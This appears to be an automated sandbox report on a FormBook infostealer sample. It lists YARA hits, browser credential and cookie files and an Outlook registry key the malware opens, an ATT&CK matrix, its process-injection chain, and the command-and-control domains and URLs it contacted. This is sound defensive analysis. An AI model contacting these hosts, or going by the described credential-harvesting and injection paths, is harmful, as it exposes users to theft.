                Source: C:\Users\user\Desktop\1162-201.exeCode function: 0_2_00C5B952 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,0_2_00C5B952
                Source: C:\Users\user\Desktop\1162-201.exeCode function: 0_2_00C242DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00C242DE

                Stealing of Sensitive Information

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000006.00000002.4615499676.0000000002480000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.4623571389.00000000028F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.4623321437.00000000028A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2579849248.0000000003F90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2581550429.0000000005DA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.4625453218.0000000005240000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.4623485395.0000000002DB0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2578577901.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Tries to harvest and steal browser information (history, passwords, etc)
                Source: C:\Windows\SysWOW64\chkntfs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\chkntfs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\chkntfs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\chkntfs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Windows\SysWOW64\chkntfs.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\chkntfs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\chkntfs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\chkntfs.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Tries to steal Mail credentials (via file / registry access)
                Source: C:\Windows\SysWOW64\chkntfs.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior

                Remote Access Functionality

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000006.00000002.4615499676.0000000002480000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.4623571389.00000000028F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.4623321437.00000000028A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2579849248.0000000003F90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2581550429.0000000005DA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.4625453218.0000000005240000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.4623485395.0000000002DB0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2578577901.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire Infrastructure2
                Valid Accounts                		1
                Native API                		1
                DLL Side-Loading                		1
                Abuse Elevation Control Mechanism                		1
                Deobfuscate/Decode Files or Information                		1
                OS Credential Dumping                		2
                System Time Discovery                		Remote Services1
                Archive Collected Data                		4
                Ingress Tool Transfer                		Exfiltration Over Other Network Medium1
                System Shutdown/Reboot
                CredentialsDomainsDefault AccountsScheduled Task/Job2
                Valid Accounts                		1
                DLL Side-Loading                		1
                Abuse Elevation Control Mechanism                		21
                Input Capture                		2
                File and Directory Discovery                		Remote Desktop Protocol1
                Data from Local System                		1
                Encrypted Channel                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)2
                Valid Accounts                		3
                Obfuscated Files or Information                		Security Account Manager116
                System Information Discovery                		SMB/Windows Admin Shares1
                Email Collection                		4
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook21
                Access Token Manipulation                		1
                DLL Side-Loading                		NTDS141
                Security Software Discovery                		Distributed Component Object Model21
                Input Capture                		4
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script412
                Process Injection                		2
                Valid Accounts                		LSA Secrets2
                Virtualization/Sandbox Evasion                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts2
                Virtualization/Sandbox Evasion                		Cached Domain Credentials3
                Process Discovery                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items21
                Access Token Manipulation                		DCSync11
                Application Window Discovery                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job412
                Process Injection                		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1587354 Sample: 1162-201.exe Startdate: 10/01/2025 Architecture: WINDOWS Score: 100 28 www.laduta.xyz 2->28 30 www.explorevision.xyz 2->30 32 17 other IPs or domains 2->32 42 Suricata IDS alerts for network traffic 2->42 44 Antivirus / Scanner detection for submitted sample 2->44 46 Multi AV Scanner detection for submitted file 2->46 50 4 other signatures 2->50 10 1162-201.exe 1 2->10         started        signatures3 48 Performs DNS queries to domains with low reputation 30->48 process4 signatures5 62 Binary is likely a compiled AutoIt script file 10->62 64 Writes to foreign memory regions 10->64 66 Maps a DLL or memory area into another process 10->66 68 Switches to a custom stack to bypass stack traces 10->68 13 svchost.exe 10->13         started        process6 signatures7 70 Maps a DLL or memory area into another process 13->70 16 OtAlYRopPg.exe 13->16 injected process8 signatures9 40 Found direct / indirect Syscall (likely to bypass EDR) 16->40 19 chkntfs.exe 13 16->19         started        process10 signatures11 52 Tries to steal Mail credentials (via file / registry access) 19->52 54 Tries to harvest and steal browser information (history, passwords, etc) 19->54 56 Modifies the context of a thread in another process (thread injection) 19->56 58 3 other signatures 19->58 22 OtAlYRopPg.exe 19->22 injected 26 firefox.exe 19->26         started        process12 dnsIp13 34 www.ripbgs.info 47.83.1.90, 49992, 49993, 49994 VODANETInternationalIP-BackboneofVodafoneDE United States 22->34 36 itcomp.store 103.247.11.204, 50015, 50016, 50017 RUMAHWEB-AS-IDRumahwebIndonesiaCVID Indonesia 22->36 38 10 other IPs or domains 22->38 60 Found direct / indirect Syscall (likely to bypass EDR) 22->60 signatures14

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                1162-201.exe36%VirustotalBrowse
                1162-201.exe58%ReversingLabsWin32.Trojan.AutoitInject
                1162-201.exe100%AviraDR/AutoIt.Gen8
                1162-201.exe100%Joe Sandbox ML

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                http://www.einpisalpace.shop/pgw3/0%Avira URL Cloudsafe
                http://www.mzkd6gp5.top/utww/0%Avira URL Cloudsafe
                http://www.liuhuazhibo.net0%Avira URL Cloudsafe
                http://www.oshwal.net0%Avira URL Cloudsafe
                http://www.maituzhibo.com0%Avira URL Cloudsafe
                http://www.zhonglangzhibo.net0%Avira URL Cloudsafe
                https://laduta.xyz/d89m?-0-L9xY=wOJtjxBUJG0NHp56IJ7sd%2F1V3u72daYOpRR77J0hq9zwdUZOJreNUKl0%Avira URL Cloudsafe
                http://www.liufangzhibo.com0%Avira URL Cloudsafe
                http://www.jiuyuezhibo.net0%Avira URL Cloudsafe
                http://www.babyzhibo.net/template/news/wandoujia/static/picture/qr-4_httpswww.wandoujia.comqr.png0%Avira URL Cloudsafe
                http://www.babyzhibo.net/wn9b/?-0-L9xY=vboslbB2+fPQbuQgZEku0U8Mit34kv6hkjEO/9jYS6JieTwBpMMlA1+GJuZnlONOskCea7euAeJ8nc5JKxSpmkXrUEu+S/eo/p+L/n9ML9zYgduzowjOe25j+nYWtjJhKH1IZis=&Mn=PdO8wZnxGnZX0%Avira URL Cloudsafe
                http://www.yundouzhibo.net0%Avira URL Cloudsafe
                http://www.medicalink.net0%Avira URL Cloudsafe
                http://www.lovemarketing.net0%Avira URL Cloudsafe
                http://www.elecsa.net0%Avira URL Cloudsafe
                http://www.qimiaozhibo.com0%Avira URL Cloudsafe
                http://www.wuyezhibo.com0%Avira URL Cloudsafe
                http://www.maskmakers.net0%Avira URL Cloudsafe
                http://www.xiaomiaozhibo.net0%Avira URL Cloudsafe
                http://einpisalpace.shop/0%Avira URL Cloudsafe
                http://www.banditi.net0%Avira URL Cloudsafe
                http://www.68markavenue.net0%Avira URL Cloudsafe
                http://www.eventsmedia.net0%Avira URL Cloudsafe
                https://white.anva.org.cn/0%Avira URL Cloudsafe
                http://www.overlayoasis.quest0%Avira URL Cloudsafe
                http://www.welovebeauty.net0%Avira URL Cloudsafe
                http://www.nuoyunzhibo.com0%Avira URL Cloudsafe
                http://www.agrobazar.net0%Avira URL Cloudsafe
                http://www.hairdeluxe.net0%Avira URL Cloudsafe
                http://www.legalvideos.net0%Avira URL Cloudsafe
                http://www.babyzhibo.net/wn9b/0%Avira URL Cloudsafe
                http://www.xunaizhibo.com/binding0%Avira URL Cloudsafe
                http://www.perfectpint.net0%Avira URL Cloudsafe
                https://zzlz.gsxt.gov.cn/0%Avira URL Cloudsafe
                http://www.huayuzhibo.net0%Avira URL Cloudsafe
                http://www.theflowerpot.net0%Avira URL Cloudsafe
                http://www.babyzhibo.net/template/news/wandoujia/static/js/footer.fe363a40.js0%Avira URL Cloudsafe
                http://www.babyzhibo.net/template/news/wandoujia/static/js/aggregatedentry.fe363a40.js0%Avira URL Cloudsafe
                http://www.legalstrategy.net0%Avira URL Cloudsafe
                http://www.rsbi.net0%Avira URL Cloudsafe
                http://www.wuyezhibo.net0%Avira URL Cloudsafe
                http://www.chuncaozhibo.net0%Avira URL Cloudsafe
                http://www.babyzhibo.net/template/news/wandoujia/static/picture/qr-5_httpswww.wandoujia.comqr.png0%Avira URL Cloudsafe
                http://www.implantcentre.net0%Avira URL Cloudsafe
                http://www.xingyuanzhibo.net0%Avira URL Cloudsafe
                http://www.itcomp.store/h4q2/?-0-L9xY=O7WWq9F6w4cGi/1xuyqA6hNbNZ9TTDUhOaeE1BmWFQlzRYYNMfDiNCsBOldRtXetUX45l8haztomC58f/ZN8Kn/la1SkzkcShgzFC6zVssbmmh1rF7ne1GqBaj3+VQkehMq71iQ=&Mn=PdO8wZnxGnZX0%Avira URL Cloudsafe
                http://www.easygram.net0%Avira URL Cloudsafe
                http://www.qinglizhibo.net0%Avira URL Cloudsafe
                http://www.yanyuzhibo.com0%Avira URL Cloudsafe
                http://www.liangmeizhibo.net0%Avira URL Cloudsafe
                http://www.mynewshub.net0%Avira URL Cloudsafe
                http://www.babyzhibo.net/template/news/wandoujia/static/js/index.umd.js0%Avira URL Cloudsafe
                http://www.startuptalent.net0%Avira URL Cloudsafe
                http://www.lovevintage.net0%Avira URL Cloudsafe
                http://www.gotogermany.net0%Avira URL Cloudsafe
                http://www.100millionjobs.africa/oqj2/0%Avira URL Cloudsafe
                http://www.babyzhibo.net/template/news/wandoujia/static/css/pcmodule.edd4638c5c3b3039832390269d40f1d0%Avira URL Cloudsafe
                http://www.hiload.net0%Avira URL Cloudsafe
                http://www.infovea.tech/s1ai/?Mn=PdO8wZnxGnZX&-0-L9xY=OeuCC4AAQS2w6DeZmykOBUICy+Ibjx9D3RgTSDmLGyfpyTmRf/Og24qPiqLVP2x5Sr9ji300Ieqror0vpzcssLhcoQBQDTaflTjWEmv0cWcvwj5EA3qCrdMAiiyroqZ2qSN6N28=0%Avira URL Cloudsafe
                http://www.biomedika.net0%Avira URL Cloudsafe
                http://www.babyzhibo.net/template/news/wandoujia/static/picture/anva-zilv.png0%Avira URL Cloudsafe
                http://www.luxbrand.net0%Avira URL Cloudsafe
                http://www.happystories.net0%Avira URL Cloudsafe
                http://www.athousandwords.net0%Avira URL Cloudsafe
                http://www.babyzhibo.net/template/news/wandoujia/static/js/footerbar.fe363a40.js0%Avira URL Cloudsafe
                http://www.babyzhibo.net/template/news/wandoujia/static/js/replyItem.fe363a40.js0%Avira URL Cloudsafe
                http://www.yanyangzhibo.com0%Avira URL Cloudsafe
                http://www.bodyonline.net0%Avira URL Cloudsafe
                http://www.babyzhibo.net/template/news/wandoujia/static/js/js.js0%Avira URL Cloudsafe
                http://www.babyzhibo.net/template/news/wandoujia/static/css/appsdetail.6f4104a5611f3a6cc38f23add3deb0%Avira URL Cloudsafe
                http://www.losbravos.net0%Avira URL Cloudsafe
                http://www.methlab.net0%Avira URL Cloudsafe
                http://www.megaos.net0%Avira URL Cloudsafe
                http://www.allprinting.net0%Avira URL Cloudsafe
                http://www.qiyuezhibo.net0%Avira URL Cloudsafe
                http://www.miaozhaozhibo.net0%Avira URL Cloudsafe
                http://www.huoyazhibo.net0%Avira URL Cloudsafe
                http://www.babyzhibo.net/template/news/wandoujia/static/js/bl.js0%Avira URL Cloudsafe
                http://www.electrocat.net0%Avira URL Cloudsafe
                http://www.babyzhibo.net/template/news/wandoujia/static/js/header.fe363a40.js0%Avira URL Cloudsafe
                http://www.naikuaizhibo.com0%Avira URL Cloudsafe
                http://www.implantcentre.net/binding0%Avira URL Cloudsafe
                http://www.babyzhibo.net/template/news/wandoujia/static/picture/default_avatar.jpg0%Avira URL Cloudsafe
                http://www.anmozhibo.net0%Avira URL Cloudsafe
                http://www.liguizhibo.net0%Avira URL Cloudsafe
                http://www.einpisalpace.shop/pgw3/?Mn=PdO8wZnxGnZX&-0-L9xY=giVj5h0GrIkb2nAntMgQgIHhz9vsvZP6QDamwOszT0WhTX9+0mDl7NHSkZ+hOyPxCf2Vu3CaIskW8RrY03yQo2eiaMWSi+vSOZimmmNTE2YBudIqT+28rai5l9Ujnr5BEbYzzwU=0%Avira URL Cloudsafe
                http://www.qilinzhibo.net0%Avira URL Cloudsafe
                http://www.overlayoasis.quest/ufm5/0%Avira URL Cloudsafe
                http://www.aguardiente.net0%Avira URL Cloudsafe
                http://www.xiapizhibo.net0%Avira URL Cloudsafe
                http://www.babyzhibo.net/template/news/wandoujia/static/js/tracker.fe363a40.js0%Avira URL Cloudsafe
                http://www.eurosupport.net0%Avira URL Cloudsafe
                http://www.kleenair.net0%Avira URL Cloudsafe

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                www.laduta.xyz
                		192.64.119.109
                		truetrue
                  		unknown
                  www.babyzhibo.net
                  		192.186.58.31
                  		truetrue
                    		unknown
                    www.potorooqr.lol
                    		127.0.0.1
                    		truefalse
                      		unknown
                      url.gname.net
                      		172.65.235.97
                      		truefalse
                        		high
                        infovea.tech
                        		76.223.67.189
                        		truetrue
                          		unknown
                          www.einpisalpace.shop
                          		188.114.96.3
                          		truetrue
                            		unknown
                            www.explorevision.xyz
                            		162.0.236.169
                            		truetrue
                              		unknown
                              itcomp.store
                              		103.247.11.204
                              		truetrue
                                		unknown
                                www.mzkd6gp5.top
                                		104.21.64.1
                                		truetrue
                                  		unknown
                                  100millionjobs.africa
                                  		136.243.64.147
                                  		truetrue
                                    		unknown
                                    www.overlayoasis.quest
                                    		172.67.148.216
                                    		truetrue
                                      		unknown
                                      www.ripbgs.info
                                      		47.83.1.90
                                      		truetrue
                                        		unknown
                                        www.itcomp.store
                                        		unknown
                                        		unknownfalse
                                          		unknown
                                          www.glyttera.shop
                                          		unknown
                                          		unknownfalse
                                            		unknown
                                            www.kx22368.shop
                                            		unknown
                                            		unknownfalse
                                              		unknown
                                              www.100millionjobs.africa
                                              		unknown
                                              		unknownfalse
                                                		unknown
                                                www.infovea.tech
                                                		unknown
                                                		unknownfalse
                                                  		unknown
                                                  www.0303588a47.buzz
                                                  		unknown
                                                  		unknownfalse
                                                    		unknown
                                                    www.tizzles.tech
                                                    		unknown
                                                    		unknownfalse
                                                      		unknown

                                                      Contacted URLs

                                                      NameMaliciousAntivirus DetectionReputation
                                                      http://www.mzkd6gp5.top/utww/true
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.einpisalpace.shop/pgw3/true
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.babyzhibo.net/wn9b/?-0-L9xY=vboslbB2+fPQbuQgZEku0U8Mit34kv6hkjEO/9jYS6JieTwBpMMlA1+GJuZnlONOskCea7euAeJ8nc5JKxSpmkXrUEu+S/eo/p+L/n9ML9zYgduzowjOe25j+nYWtjJhKH1IZis=&Mn=PdO8wZnxGnZXtrue
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.babyzhibo.net/wn9b/true
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.itcomp.store/h4q2/?-0-L9xY=O7WWq9F6w4cGi/1xuyqA6hNbNZ9TTDUhOaeE1BmWFQlzRYYNMfDiNCsBOldRtXetUX45l8haztomC58f/ZN8Kn/la1SkzkcShgzFC6zVssbmmh1rF7ne1GqBaj3+VQkehMq71iQ=&Mn=PdO8wZnxGnZXtrue
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.infovea.tech/s1ai/?Mn=PdO8wZnxGnZX&-0-L9xY=OeuCC4AAQS2w6DeZmykOBUICy+Ibjx9D3RgTSDmLGyfpyTmRf/Og24qPiqLVP2x5Sr9ji300Ieqror0vpzcssLhcoQBQDTaflTjWEmv0cWcvwj5EA3qCrdMAiiyroqZ2qSN6N28=true
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.100millionjobs.africa/oqj2/true
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.einpisalpace.shop/pgw3/?Mn=PdO8wZnxGnZX&-0-L9xY=giVj5h0GrIkb2nAntMgQgIHhz9vsvZP6QDamwOszT0WhTX9+0mDl7NHSkZ+hOyPxCf2Vu3CaIskW8RrY03yQo2eiaMWSi+vSOZimmmNTE2YBudIqT+28rai5l9Ujnr5BEbYzzwU=true
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.overlayoasis.quest/ufm5/true
                                                      • Avira URL Cloud: safe
                                                      		unknown

                                                      URLs from Memory and Binaries

                                                      NameSourceMaliciousAntivirus DetectionReputation
                                                      https://www.12377.cn/chkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpfalse
                                                        		high
                                                        https://beian.miit.gov.cn/#/Integrated/indexchkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpfalse
                                                          		high
                                                          https://duckduckgo.com/chrome_newtabchkntfs.exe, 00000006.00000002.4627180441.000000000756E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            		high
                                                            http://www.jiuyuezhibo.netchkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://www.maituzhibo.comchkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://www.babyzhibo.net/template/news/wandoujia/static/picture/qr-4_httpswww.wandoujia.comqr.pngchkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            https://duckduckgo.com/ac/?q=chkntfs.exe, 00000006.00000002.4627180441.000000000756E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://push.zhanzhang.baidu.com/push.jschkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                		high
                                                                http://www.oshwal.netOtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://www.zhonglangzhibo.netchkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://www.liuhuazhibo.netchkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                https://laduta.xyz/d89m?-0-L9xY=wOJtjxBUJG0NHp56IJ7sd%2F1V3u72daYOpRR77J0hq9zwdUZOJreNUKlOtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003386000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://www.liufangzhibo.comchkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://www.qimiaozhibo.comchkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://www.elecsa.netchkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://www.medicalink.netchkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://www.lovemarketing.netchkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://www.yundouzhibo.netchkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://www.maskmakers.netchkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://www.xiaomiaozhibo.netchkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://einpisalpace.shop/OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003518000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://www.wuyezhibo.comchkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://www.banditi.netchkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://www.eventsmedia.netchkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
